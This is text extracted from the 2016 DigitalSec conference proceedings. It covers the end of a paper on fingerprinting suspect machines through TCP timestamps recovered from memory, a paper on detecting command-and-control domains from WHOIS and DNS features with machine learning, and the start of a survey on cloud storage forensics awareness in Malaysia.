routed to the suspects machine.The investigators
next job is to seize the suspect machine and search
for the special marks (the TCP timestamps) in its
memory. Finding many unique TCP timestamp
values in memory assures the investigator about
the machine.

69

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

4.1

Experiments invariants

Here is a baseline that applies to the experiment


described below:
The experiment is conducted on both Linux
Ubuntu 12.04 and Windows 7 Professional machines.
The experiment is repeated three times to ensure consistent results.
Figure 3: Investigation model.

The recipients machine is restarted after conducting an experiment.


A hundred packets are sent in the experiment.
The packets are created manually and the
timestamp is set completely randomly. The
random numbers are generated with high values to avoid generating small values, such as
0s, which can found in memory in normal
cases with high probability. We also make
sure that a random number, when chosen, is
not repeated any more. We used Scapy1 , a
well-known packet sniffing and manipulation
python library, to shape the packets.

Figure 4: Networking setup.

Experimental Setup

We design our experiment around the following


question: Can the TCP timestamps be
used in fingerprinting a violating machine?
Figure 4 shows the basic networking setup for
our experiments. A virtual machine is running
Linux Ubuntu 12.04 or Windows 7 with 2 GB of
RAM. The VM is connected to the host machine
through a bridged networking. The host machine
runs Ubuntu 12.04 and is connected to a router,
which is, in turn, connected to the Internet.

ISBN: 978-1-941968-37-6 2016 SDIWC

The memory of the recipients machine is


dumped just before, 10 seconds, 10 minutes,
1 hour, 6 hours, and 12 hours after sending
the packets.
We consider integer endianness in searching
for artifacts. Big-endian integer format refers
to bytes order within a memory word where
the most significant byte of the integer is
stored in the smallest address of the word and
the least significant byte is stored in the largest
address. In contrast, in the little-endian format, the most significant byte is stored in the
largest word address and the least significant
byte is stored in the smallest word address.
Integers in Intel machines are represented in
little-endian, while integers in the network representation are in big-endian.
1 http://www.secdev.org/projects/scapy/

70

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Figure 5: TCP half-open (Linux).

4.2

The experiment: TCP half-open

Each TCP connection starts with sending a SYN


packet to an open port. The receiver responds with
a SYN-ACK packet and stays in, what is called, a
half-open state, waiting for the last ACK packet
to complete the three-way handshake connection
establishment. In this experiment, we create 100
SYN packets and send them to a listening web
server in a virtual machine. The web servers are
Apache and IIS on the Linux and Windows machines, respectively. However, we do not send the
last ACK to check how that affects the memory
lifetime of the packets fields of interest.
An important issue in this experiment is that the
TCP connection is not completed and thus the recipient is unaware of what the investigator is doing.
Furthermore, because the packets look like as they
are coming from different places (the Source IP is
random in each packet), the recipient has no idea
of who is doing what.

Results

In this section, we present our results for the experiments discussed in Section 4. Because the experiment was conducted on both Linux and Windows
machines, we will show two figures; one for Linux
and another for Windows. In addition, because the
experiment is conducted three times, the numbers
are averaged over three runs.
We want to check for the TCP timestamps in the

ISBN: 978-1-941968-37-6 2016 SDIWC

Figure 6: TCP half-open (Windows).


recipients memory. Because we send 100 packets
in each experiment and we dump the recepients
memory at different times, we search for the timestamps in the memory dumps. We search for the 100
timestamps (both big and little endian formats) in
all the memory dumps and we record how many
of them are found on each dump. We average the
results over three runs in this way: we accumulate
all the results of all the 100 packets for a specific
dump and divide over 3. For example, if 92 timestamps (out of 100) are found in the 10 Sec dump
in the first run, 93 in the second, and 94 in the
third, then we plot 93 as the average in the 10
Sec dump. Finally, the B in, for example, Timestamp(B) refers to the Big-endian format, and L
refers to the Little-endian format. The x-axis in
all figures represents the memory dumps named
with the time at which the memory is dumped after
completely sending the packets to the recipient.
Figures 5 and 6 show the results for our experiment for both Linux and Windows machines,
respectively. In this experiment, we send 100 SYN
packets to listening services (Apache and IIS). Both
figures show that all the artifacts2 are almost zeros
(i.e., not found) before sending the packets. This
is very intuitive because the packets have not been
sent yet. Furthermore, both figures show that most
artifacts can be found right after sending the packets. In both figures, the artifacts are decreasing
over time. However, we can find the Timestamp(L)
2 The artifacts means here all the values for the protocols fields which we are searching for in memory.

71

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

artifacts in both Linux and Windows.


The experiments in this section show that
we can always shape packets to make up scenarios/cases that suits the Operating System (OS) so that we can find as many protocols memory artifacts as possible and thus
be able to fingerprint a specific machine.

Discussion and future work

In this paper, we examined the usage of the TCP


timestamps in fingerprinting machines. Experimenting with the other TCP header fields such as
source and destination ports, sequence numbers,
and acknowledgment numbers is a future direction.
In addition, utilizing other protocols, such as IP,
ICMP, IPv6, HTTP (Hypertext Transfer Protocol), FTP (File Transfer Protocol), and RTP (Realtime Transport Protocol), is another future possibility.
Even though the memory is volatile, it contains
very valuable information. Investigators are interested in any useful source of information that has
a potential in resolving cases. Another impact on
the memory is whether the tested machine is heavyloaded or not. Expanding our experiments to make
the tested machine busy improves the trustworthy
of our results. In addition, finding protocol artifacts in permanent storage devices such as hard
drives can be conducted.

Windows machine [14].


[3] provided a dynamic information flow system
through tracking tainted data in whole system to
study the in-memory data lifetime. Several works
show that sensitive information can be extracted
from the memory [7, 5, 4, 2]. A way to securely
deallocate memory is presented by [4].
The closest to our work is what is done by [1].
The researchers show that an investigator can leave
some fingerprints in the TCP and/or application
buffers after establishing a connection through the
send() and recv() socket functions. However, our
work is different in that we exploit the control fields
in the protocols headers to leave the fingerprints.
Furthermore, in our work, we do not need to establish connections or even to send data to a listening
service. This makes our work stealthier.

Conclusion

Digital forensics is necessary to deter cyber criminals. Furthermore, having accountability-proving


mechanism helps achieving the non-repudiation
feature. This paper utilizes the timestamp field in
the TCP header to fingerprint a suspect machine.
We show that TCP timestamps can be recovered
from memory even after 12 hours. In addition, this
paper shows that the type of the OS plays an important role in determining how long artifacts can
still be recovered. We argue that our findings can
be utilized in stealthily fingerprinting violating machines.

Related work

The in-memory data have been considered in several works from security and forensics perspectives
[1, 8, 12, 10, 14, 11, 3, 7, 5, 4, 2, 9, 13].
Even after process termination, 90% of information about processes can still be recovered from the
non-paged memory of a Windows machine for more
than a day [10]. Data lifetime of the userspace portion of the process address space has been studied
by [12]. In addition, the lifetime of the freed memory portions is examined by [6]. Over time, only
15% of memory contents are changed in an idle

ISBN: 978-1-941968-37-6 2016 SDIWC

References
[1] M. I. Al-Saleh and Z. A. Al-Sharif. Utilizing
data lifetime of {TCP} buffers in digital forensics: Empirical study. Digital Investigation,
9(2):119 124, 2012.
[2] P. Broadwell, M. Harren, and N. Sastry.
Scrash: a system for generating secure crash
information. In Proceedings of the 12th conference on USENIX Security Symposium - Vol-

72

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

ume 12, SSYM03, pages 1919, Berkeley, CA,


USA, 2003. USENIX Association.
[3] J. Chow, B. Pfaff, T. Garfinkel, K. Christopher, and M. Rosenblum. Understanding data
lifetime via whole system simulation. In Proc.
13th USENIX Security Symposium, August
2004.
[4] J. Chow, B. Pfaff, T. Garfinkel, and M. Rosenblum.
Shredding your garbage: reducing data lifetime through secure deallocation. In Proceedings of the 14th conference
on USENIX Security Symposium - Volume 14,
SSYM05, pages 2222, Berkeley, CA, USA,
2005. USENIX Association.
[5] D. Engler, D. Y. Chen, S. Hallem, A. Chou,
and B. Chelf. Bugs as deviant behavior: a
general approach to inferring errors in systems
code. In Proceedings of the eighteenth ACM
symposium on Operating systems principles,
SOSP 01, pages 5772, New York, NY, USA,
2001. ACM.

[11] M. Simon and J. Slay. Recovery of skype application activity data from physical memory.
In ARES, pages 283288, 2010.
[12] J. Solomon, E. Huebner, D. Bem, and
M. Sze?ynska. User data persistence in physical memory. Digital Investigation, 4(2):68
72, 2007.
[13] R. M. Stevens and E. Casey. Extracting
windows command line details from physical memory. Digital Investigation, 7, Supplement(0):S57 S63, 2010. ce:titleThe Proceedings of the Tenth Annual {DFRWS} Conference/ce:title.
[14] A. Walters and N. L. Petroni. Volatools : Integrating volatile memory forensics into the digital investigation process. Digital Investigation,
pages 118, 2007.

[6] D. Farmer and W. Venema. Forensic Discovery. Addison Wesley Professional, 2004.
[7] T. Garfinkel, B. Pfaff, J. Chow, and M. Rosenblum. Data lifetime is a systems problem.
In Proceedings of the 11th workshop on ACM
SIGOPS European workshop, EW 11, New
York, NY, USA, 2004. ACM.
[8] H. Inoue, F. Adelstein, and R. A. Joyce.
Visualization in testing a volatile memory forensic tool.
Digital Investigation,
8(Supplement):S42S51, 2011.
[9] J. Sammons. The Basics of Digital Forensics: The Primer for Getting Started in Digital Forensics. Elsevier, 2012.
[10] A. Schuster. The impact of microsoft windows
pool allocation strategies on memory forensics.
Digital Investigation, 5, Supplement(0):S58
S64, 2008. The Proceedings of the Eighth Annual DFRWS Conference.

ISBN: 978-1-941968-37-6 2016 SDIWC

73

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Method for Detecting a Malicious Domain by using WHOIS and DNS features
MASAHIRO KUYAMA, YOSHIO KAKIZAKI and RYOICHI SASAKI
Tokyo Denki University
Tokyo, Japan
[email protected]

ABSTRACT
Damages caused by targeted attacks are a serious
problem. It is not enough to prevent only the initial
infections, because techniques for targeted attacks
have become more sophisticated every year,
especially those seeking to illegally acquire
confidential information. In a targeted attack,
various communications are performed between the
command and control server (C&C server) and the
local area network (LAN), including the terminal
infected with malware. Therefore, it is possible to
find the infected terminal in the LAN by monitoring
the communications with the C&C server. In this
study, we propose a method for identifying the
C&C server by using supervised machine learning
and the feature points obtained from WHOIS and
the DNS of domains of C&C servers and normal
domains. Moreover, we conduct an experiment that
applies real data, and we verify the usefulness of
our method by a cross-validation method. As a
result of the experiment, we could obtain a high
detection rate of about 98.5%.

KEYWORDS
Malware, C&C server, Neural network, SVM

1 Introduction
Damages caused by targeted attacks are a
serious problem [1]. Many targeted attacks aim
at illegal acquisition of confidential information,
such as intellectual property and private
information. A target of this type of attack is a
specific company or organization. To achieve
their objectives, attackers infect terminals with
malware attached to e-mail and use the driveby-download attack.

ISBN: 978-1-941968-37-6 2016 SDIWC

In Japan, many organizations, including a


leading heavy industry manufacturer, the House
of Representatives, and the Japan Pension
Service, have been subject to attacks and
suffered significant damage. Multi-layered
countermeasures at the entry point and the exit
point are required because it is very difficult to
prevent attacks.
Figure 1 shows the sequence of a targeted
attack.
Step 1: A terminal such as a PC in a local area
network (LAN) is infected with
malware for the targeted attack.
Step 2: The terminal infected with malware
communicates with the C&C server.
Then, more malware is downloaded to
the terminal.
Step 3: The malware attempts to expand the
invasion range to other PCs and
servers in the LAN.
Step 4: Important information, confidential
information and private information of
the organization is transmitted to the
C&C server owned by the attacker
located outside of the LAN.
If we can detect the infection of a terminal in
the LAN and the communication with the C&C
server, we are able to protect the expansion of
damages. However, to detect the infection, we
have to identify the C&C server in advance.
New C&C servers are continuously made by
attackers, and they are not typically listed on
the blacklists containing the IP addresses of
many C&C servers. For this reason, we need to
develop a method to find new C&C servers.

74

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

response to unverified issues such as zero-day


attacks should be solved.

Fig. 1 Sequence of targeted attacks


In our past study, we proposed a detection
technique that had a 96.5% detection rate in
2009 [2].
In this study, we extract the feature points of
WHOIS and the information of the Domain
Name System (DNS) from a C&C server
domain, and we try to detect the C&C server by
using a neural network. We choose feature
points according to their difficulty of spoofing:
valid terms, expiration dates, and e-mail
addresses from the WHOIS information, the
number of mail exchanger (MX) records, and
number of name server (NS) records from the
DNS information.
2 Related Work
Studies for specifying the C&C server are
classified into the following two types.
(1) Studies that focus on communication
packets between the bot PC and the C&C server
Jang et al. [3] and Lu et al. [4] proposed
methods to detect the C&C server by analyzing
the payload of communication packets between
the bot PC and the C&C server. These methods
have a high detection rate, because the data
body is used for verification and excludes
header information, such as the destination
address and the source address, which might
have a specification change such as the port
number or a proprietary protocol of the
transport layer.
However, we have to observe real-time
communication. Moreover, inadequacies in the

ISBN: 978-1-941968-37-6 2016 SDIWC

(2) Studies that focus on domain information


of the C&C server
A bot PC may request name resolution from the
DNS server related to the offending C&C
server.
Tsai et al. [5] reported a method based on a data
mining technique called RIPPER, which uses
the combination of information obtained from
the domain information and the external
repositories of the C&C server. The failure rate
of detection is high, although this method does
have an adequate accuracy rate of detected
C&C servers.
Our method [2] uses a valid term and reverse
lookup of C&C domain information from the
DNS server and WHOIS. Therefore, the data
acquisition required for analysis is easy, and the
possibility to be infected with malware is low.
This study reviews the identification of the
C&C server in targeted attacks.
We have been continuing our investigation of
the detection rate, which has decreased with
time. As shown in Table 1, the detection rate
for the data of 2009 was 96.5%. However, the
detection rate fell to 85.0% in 2010 and 76.2%
in 2011. These results reveal that the 2009
parameters were not suitable for 2010 and 2011.
Thus, we updated the discriminative model by
using recent data to adjust the optimal detection
method in each time period.
Table 1 Detection rates of our method over time
Detection rate%
Year
2009 2010 2011 2013 2014
2009 96.5 85.0 76.5
95.2 42.5
2011
80.3 80.8
2013
96.7
2014
In our 2014 update, we revised our method to
use quantification theory and machine learning.

75

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

The result was still not high enough, although


the detection rate improved to 96.7% in 2014.
3 Methods
Our proposed method focuses on the domain of
the C&C server.
The method uses the WHOIS and the DNS
information from the C&C server's domain.
Our method can identify C&C servers by
extracting the feature points for machine
learning.
To classify a domain as malignant (C&C) or
benign (normal), we use machine learning to
construct the training model as advance
preparation.
3.1 Detection method
First, we prepare benign domains and
malignant domains. Then, features points are
extracted from the WHOIS and DNS for each
domain.
The extracted features are used in machine
learning to construct a training model (Figure
2).The training model determines whether an
accessed domain is malignant or benign.

3.2 Preparing domains


We prepare two types of domains: normal
domains and C&C domains.
We choose the normal domains from "The top
500 sites on the web" of Alexa [6], because the
top sites have highly secure domains, which are
best for the normal domains.
The C&C servers are extracted by analyzing
Emdivi, PlugX, and PoisonIvy, which are major
malwares for targeted attacks [7,8].
We obtain 163 malwares by using VirusTotal
[9] (Table 2).
Table 2 Collected malwares from VirusTotal
Malware type
# samples
Emdivi
50
PlugX
63
PoisonIvy
50
The collected malwares are deeply analyzed by
using the Sandbox analyzer called LastLine
[10]. LastLine extracted 54 domain destinations
from the analysis results.
3.3 Features of WHOIS
We can obtain the following information from
WHOIS.
a) Registered domain name
b) Registrar name
c) DNS server name of the domain that has
been registered
d) Valid term of the domain
e) Expiration date of the domain
f) Domain name registrant contact
g) Person in charge for technical contact
h) Contact for registration personnel
i) Contact point for the registrant

Fig. 2. Method Flow

ISBN: 978-1-941968-37-6 2016 SDIWC

It is difficult to tamper with the information


from a) to e). The valid period d) for normal
servers is long term, but that for C&C servers is
short term, because C&C domains are canceled
if their purpose is achieved [11, 12, 13]. From

76

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

this viewpoint, we calculate the valid term by


subtracting the date of d) from the date of e).
Figure 3 shows the valid period for C&C
domains and normal domains.
day

Fig. 3 Valid terms of domains

Thus, we pay attention to e-mail addresses from


the WHOIS information. First, we extract email addresses from the WHOIS information
for the normal domains and then for the C&C
domains, and we conduct data mining.
We extract the features for each domain by
using a text mining tool called "UserLocal"
[14].
We show the co-occurrence network, which is
the appearance pattern of words used in the email addresses of the normal domains (Figure
4) and the C&C domains (Figure 5).
The co-occurrence network shows the relations
by structuring the word patterns used in the text.
Similar words of the appearance pattern are
connected by a line.
We reveal the structures of the e-mail addresses
for the domains and try to extract the features
by using the word patterns.

As can be seen in Figure 4, the valid term of the


C&C domains is shorter than that of the normal
domains.
Next, we obtain the following information for
each contact person from f) to i).
a)
b)
c)
d)
e)
f)
g)
h)
i)

ID
Name
Organization name
Address
Postal code
Phone number
Country
FAX number
E-mail address

All of the above information can be easily


falsified.
Especially, the registration information of most
the C&C domains is false, because the attackers
often use WHOIS registration agency services
to hide.
However, the probability of a true e-mail
address is high even if the other information is
false, because the e-mail address is required for
contact.

ISBN: 978-1-941968-37-6 2016 SDIWC

Fig. 4 Co-occurrence network (normal


domains)

77

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

a)
b)
c)
d)
e)
f)
g)
h)

A record
SOA record
HINFO record
MX record
NS record
CNAME record
WKS record
TXT record

The numbers of registered records for the NS


record (Figure 6) and the MX record (Figure 7)
show a remarkable difference.
Fig. 5 Co-occurrence network (C&C domains)
The co-occurrence network of the normal
domains shows a large structure connected with
a plurality of words, and two pattern structures
connected with four types of words. On the
other hand, the co-occurrence network of the
C&C domains shows three pattern structures
connected with three types of words. When
examined closely, "NO", "PROTECT", and
"PROXY", which are usually used by WHOIS
registration agency services, are included in
Figure 5.
In this result, we need to point out that the
WHOIS registration agency services used for
the normal domains and the C&C domains are
different.
The proportion of free e-mail addresses for the
C&C domains, 17.5%, is higher than that for
the normal domains, 13.6%.
As a result, we decide to choose three features
of the WHOIS information: domain name, email address, and the valid term.

Fig. 6 NS records

3.3 Features of DNS


We can obtain the following records from the
DNS.

Fig. 7 NS records
Hardly any records are registered in the C&C
domains, although many records are registered
in the normal domains.

ISBN: 978-1-941968-37-6 2016 SDIWC

78

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Thus, we choose these two features of DNS


information: the number of NS records and the
number of MX records.
3.4 Training model and algorithm
We construct a training model using a support
vector machine (SVM) and a neural network as
the algorithm for machine learning.
The neural network is a type of supervised
learning method.
It is possible to express the relation of the input
and the output by mathematical modeling of
some of the features found in human brain
functions [15].
The SVM is a kind of machine learning method.
SVM performs the classification of two classes
by pattern recognition [16].
We construct a training model by using a neural
network with e-mail addresses and valid terms
from WHOIS, and the number of NS records
and the number of MX records from DNS
(Figure 8).

4 Results
For evaluation, 80 normal and 54 C&C
domains were used.
Because the data amount is small, the accuracy
has a large error by how we chose the test data.
The amount of provided data of a particular
domain used for targeted attacks is small. Thus,
we evaluate the data with a cross-validation
method, because it can reduce the error margin
even if the data amount is a little.
The cross-validation method is an evaluation
method to divide the original data as learning
data in block units [17]. One of the blocks is the
test data, and the others are the learning data for
evaluation.
The evaluation consists of calculating the
average of each evaluation result as the
estimated accuracy (Fig. 9).
This evaluation method can reduce the error
margin of the estimated accuracy, even if the
data amount is a little. It can be calculated in
the following equation.
Let
be the total number of test data,
be
the total number of data classified accurately,
and be the n-th evaluation
accuracy. the estimation accuracy to be
determined is as follows:

(1)

Fig. 8 Training model construction phase


The C&C servers can be detected by using this
model implemented on the browser plugin or
the filter of a proxy server.

ISBN: 978-1-941968-37-6 2016 SDIWC

Fig. 9 Cross-validation method

79

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

We evaluate the training model using a neural


network by the cross-validation method (Table
3).
Table 3 Detection rates
Neural
SVM
network
Detection
rate

98.5%

97.8%

[4]

[5]

[6]
[7]

As a result, the neural network achieved a


superior detection rate of 98.5%, compared to
97.8% for the SVM.
5 Conclusion

[8]

[9]
[10]

In this paper, we collected the feature points of


e-mail addresses used for C&C domains and
proposed a method to determine C&C servers
by using machine learning with WHOIS and
DNS information. Moreover, we clarified the
features of WHOIS registration agency services
used for the C&C domains, by illustrating the
relation of words of extracted e-mail addresses
in the co-occurrence networks.
Finally, we evaluated domain names and e-mail
addresses from the WHOIS (the valid term, the
number of NS records, and the number of MX
records from a DNS) as input values for
machine learning. In future work, we will aim
to improve the accuracy by revising the
machine learning algorithms, input values, and
preprocessing.

REFERENCES

[11]

[12]

[13]

[14]
[15]
[16]

[17]

W. Lu, M. Tavallaee, A. A. Ghorbani, Automatic


Discovery of Botnet Communities on Large-Scale
Communication
Networks,
ASIACCS
'09
Proceedings of the 4th International Symposium on
Information, Computer, and Communications
Security(2009).
M.H.Tsai, K.C.Chang, C.C.Lin, C.H.Mao, H.M. Lee,
"C&C Tracer: Botnet Command and Control
Behavior Tracing", in IEEE International
Conference on Systems, Man and Cybernetics
(SMC), Anchorage, AK, pp.1859-1864(2011).
Alexa Top 500 Global
Siteshttp://www.alexa.com/topsites
Targeted Attack Trends 2014 Annual Report
https://www.trendmicro.com/cloudcontent/us/pdfs/security-intelligence/reports/rpttargeted-attack-trends-annual-2014-report.pdf
Trendmicro Press
http://www.trendmicro.co.jp/jp/about-us/pressreleases/articles/20150409062703.html
VirusTotal
https://www.virustotal.com/
LastLine
https://www.lastline.com/
M. Felegyhazi, C. Kreibich, and V. Paxson, "On the
Potential of Proactive Domain Blacklisting",
USENIX Conference on Large-scale Exploits and
Emergent Threats, pp.6 (2010).
J. Ma, L. K. Saul, S. Savage and G. M. Voelker,
"Beyond Blacklists: Learning to Detect Malicious
Web Sites from Suspicious URLs", ACM SIGKDD
International Conference on Knowledge Discovery
and Data Mining, pp.12451254(2009).
L. Invernizzi, S. Benvenuti, P. M. Comparetti, M.
Cova, C. Kruegel, and G. Vigna "EvilSeed: A
Guided Approach to Finding Malicious Web Pages",
IEEE Symposium on Security and Privacy, pp.428
442(2012).
User Local
http://textmining.userlocal.jp/
Multilayer Perceptron
http://deeplearning.net/tutorial/mlp.html
P.John, "A Fast Algorithm for Training Support
Vector Machines", Technical Report MSR-TR-98-14,
pp.1-21(1998).
R.Kohavi, A study of cross-validation and bootstrap
for accuracy estimation and model selection,
Proceedings of the Fourteenth International Joint
Conference on Artificial Intelligence 2 (12),
pp.1137-1143 (1995).

Cyber GRID View vol.1 English Edition


http://www.lac.co.jp/security/report/pdf/apt_report_v
ol1_en.pdf
[2] H.Mihara, R. Sasaki, Proposal and Evaluation of
Technique to Detect C&C Server on Botnet Using
Attack
Data
(CCCDATAset
2009)
and
Quantification Methods Type II, Journal of
Information Processing Society of Japan Vol. 51, No.
9, pp. 1579-1590, 2010
[3] D.I.Jang, M.Kim, H. C. Jung, B. N. Noh, Analysis
of HTTP2P Botnet: Case Study Waledac, 2009
IEEE 9th Malaysia International Conference on
Communications (Micc), pp. 409-412(2009).
[1]

ISBN: 978-1-941968-37-6 2016 SDIWC

80

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Awareness of Cloud Storage Forensics among the Users in Malaysia: A Survey


Yee Say Keat1, Babak Bashari Rad2, Mohammad Ahmadi3
School of Computing and Technology
Asia Pacific University of Technology & Innovation (APU)
Technology Park Malaysia (TPM)
Bukit Jalil, Kuala Lumpur 57000 Malaysia
1
[email protected], 2 [email protected], 3 [email protected]

ABSTRACT
Cloud storage services are widely getting
acceptance and gaining popularity, since it is
used mostly by companies and students in
Malaysian higher learning institutions. While
cloud storage services got popular within last
two years, most of the people are still trying to
adapt to this new technology and some people
still does not fully understand what cloud
storage services are. In this paper, the authors
present the results and an analysis of survey
conducted on the awareness and concerns of
Malaysians about cloud storage services, and its
forensics and security issues. Questionnaires
were administered to two hundred fifty users of
cloud storage in Malaysia and fifty to the public
to get the responses of people, especially
student concerning about the cloud storage
services. The responses from participants
revealed valuable information about the public
awareness and knowledge on cloud services.
Relevant areas that required improvements are
also investigated and discussed in this paper.
KEYWORDS
Cloud Computing, Cloud Storage, Cloud
Forensics, Cloud Security, Cloud Forensics
Awareness
1 INTRODUCTION
Cloud storage services are increasingly used by
various types of ordinary consumers and
professional businesses, as well as government

ISBN: 978-1-941968-37-6 2016 SDIWC

departments and organizations that might store


large amount of data, such as educational
institutions [1]. The new trend in storing data is
to use cloud storage, due to its convenience and
accessibility, anytime, and anywhere [2]. There
are still many problems and concerns for cloud
storages [3]. For example, if the security of the
cloud storage system has compromised, can
cloud storage administrators or investigation
officers view users confidential data and what
would be the best way to prevent that from
view? A survey has been conducted from the
users of cloud storage services and white collar
users from the Information Technology and
business based industries to explore these
concerns. The study involves data collection
among students in several universities in
Malaysia using questionnaires. The authors
believe this research would help investigators,
examiners and developers or forensic
investigation companies who are interested in
developing forensics tools, countermeasures
and techniques to develop their knowledge and
skills of investigations based on the public
consciousness of cloud storage in Malaysia.
2 LITERITURE REVIEW
Cloud storage forensic research is considered as
a new research area and hot topic in
information technology [4] [5]. As people are
trying to adapt to this new technology and
service, most of people are also trying to gain
more information and knowledge on what this
new technology can offer [6]. Furthermore, as
more people use the cloud storage services, the

81

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

more dangerous issues and challenges it will


present for security and forensic investigators
[7]. This is because cloud storage services is
open to anyone who has access to the Internet.
Users such as hackers are also welcome to use
the services to conduct any crime activities [8]
[9]. The group of hackers will find any of the
systems vulnerabilities and conduct the hacking
activities. For example, the incident about
Apple in year of 2014, around 26 various
celebrities naked photo had been taken by the
group of hackers [10]. Furthermore, Cloud
computing is computing based on the internet.
Last 10-20 years, people would run applications
or programs from software downloaded on a
physical computer or place servers inside their
organizations. However, nowadays, cloud
computing technology allows users to access to
the same kinds of programs and platform
through the internet [11].
2.1 Introduction to Cloud Computing
Cloud computing is transforming the way
information technology
is managed and
consumed, improvements in cost efficiencies,
accelerated technology and innovation, and the
ability to scope applications on demand [12].
Cloud computing is a model for an on-demand
network access to a shared pool of configurable
computing resources and it can minimize
management efforts or interaction of service
provider [13]. For example, servers, networks,
storage, services and applications, which
carrying conveniently and rapidly provisioned.
In a very simple definition for cloud computing,
it is a combination of technology, which present
a platform to provide hosting and storage
services through the internet [14]. Furthermore,
cloud computing is referring the high-end of
information technology for society, so the main
objectives for cloud computing is to produce
and offer a standard service, with low cost ondemand computing infrastructure by providing
a satisfactory resource, quality and stability of
service levels [15].

ISBN: 978-1-941968-37-6 2016 SDIWC

2.2 Cloud Computing Security and Issues


The security and privacy issues will always be a
topic of concern. In 21st century, all of us are
living in an increasingly interconnected
environments, from social-network to personal
banking and to government infrastructure, and
protecting the networks are no longer optional
for consideration [16]. There are multiple
security issues for cloud computing as it
surrounds a lot of technologies including
operating systems, virtualization, database,
transaction management and the most important
technology at the moment- network [17].
Hence, cloud computing containing a security
issues for most of these applicable technologies
and systems [18]. For example, network that
interconnects the systems in the cloud must be
secured enough in order to avoid security and
privacy issues happen in those systems or
mapping the physical machines to the virtual
machines have to be carried out securely [19].
3 AIM OF THE RESEARCH
The main aim of this research is to analyze and
identify the level of awareness of cloud storage
services among the normal users, as well as
users from the white collar organizations in
Malaysia. This is to present awareness of
Malaysians in cloud storage services that needs
further understanding of security issues
surrounding cloud storage and suggest
improvements for people who are using these
services. In order to achieve the aim of this
research, the information was gathered by using
a set of questionnaires which are given to the
respondents directly and with the aim of the
questions being clearly stated.
4 DATA COLLECTION
Data were collected for this research using
questionnaire, sent to respondents directly to
get the most relevant and helpful information.
Questionnaire also can bring many benefits
such as receive public view, comments,

82

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

thoughts and opinions in very efficient way. In


this study, the questionnaire has been produced
using Google Form, as researchers found that
most of the people would like to use this
template to reply to survey because it is very
easy to accomplish. Ten questions were
developed by the researchers and divided into
three segments: cloud computing, cloud
forensics and cloud storage security and future
expectations in cloud storage. However, the
questions were developed and created to get
important information in order to achieve the
aim of this paper.
5 SAMPLING METHODS
Stratified sampling is employed to target
populations in Malaysia. This method enables
the division of targeted population into
important different categories. However, this
research mainly focused on the cloud storage
forensic and security users. In addition, the
researchers worked out the proportions needed
for the sample to be the representative of this
study. They also identified the different types of
users as the target population. Therefore, the
researchers divided the relative percentages of
each group from the survey to make the results
more accurate. The differentiation of major
education background for cloud storage
services users will have the different point of
view of cloud storage forensic and security
issues. This is the target population from a total
of two hundred fifty users of cloud storage
services in this study on the acceptance by the
respondents, Information Technology: 55
students, Forensic and Security Computing: 75
students, Software Engineering: 40 students,
Business Administration: 40 students, Mobile
Technology: 20 and others: 20 students. In
addition, fifty white collar from industry
respondents are also participated in this
research. So, a total of three hundred cloud
storage services users were participated in this
research.

ISBN: 978-1-941968-37-6 2016 SDIWC

6 FINDINGS and ANALYSIS


This section will focus on the findings and
analysis of data which are collected by the
authors via questionnaire. In addition, the data
for this research will be presented and analyzed
using diagrams and figures.
6.1 Demographic Distribution of
Respondents
The distribution of respondents in the study is
shown in the Figure 1. It demonstrates the
education background of respondents as
following: Information Technology students:
18%, Forensic and Security Computing
students: 25%, Software Engineering students:
13%, business administration students: 13%,
Mobile Technology students 7% and others7%. In addition, 17% of the respondents are
white collar workers from the Information
Technology, security and business industries.
Education Background

18%

17%
7%
7%

25%

13%
13%

Information Technology
Forensic and Security Computing
Software Engineering
Business Administration
Mobile Technology
Others
Figure 1: Education Background

83

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

6.2 Respondents Perception of Cloud


Computing in Malaysia
In this question, the researchers surveyed
respondents
on
the
perception
and
understandings of cloud computing as a trend in
Malaysia. The questions were designed using a
five Likert scale, which are strongly agree,
agree, neutral, disagree and strongly disagree.
6.2.1 Cloud Computing as a Trend

The purpose of this question is to analyze


respondents thought for cloud computing at the
moment as the cloud computing technology is
growing fast. Figure 2 demonstrates the
responses thought of cloud computing as a
trend at the moment in Malaysia. 300
respondents answered the question, the majority
of respondents (75%) were strongly agree and
agree that cloud computing at the moment in
Malaysia is a part of the evolving and growing
process since the early years of computing.
20% of respondents strongly agree or agree that
cloud computing is a trend to compromising
security and reducing cost. Only 5% of
participants strongly agree and agree that cloud
computing is just a result of the recession for
reducing information technology cost. So,
according to the result, the researchers would
able to know that the cost reduction is not the
priority drive for cloud adoption. According to
the result, 75% of respondents believe that the
cloud computing is an evolving and evolution
process of computing. As the very basic
knowledge of Information Technology, IT
growing and changing quickly, because the
environment has changed [20]. For example, a
sales person must be carrying as many
documents as he can, to meet the customers 20
years ago. However, today he just need a tablet
or a smartphone to go through all of the
necessary documents and those documents are
stored in cloud storage. IT has become the
priority for everyone nowadays and it is also
changing the life style of human beings [21].
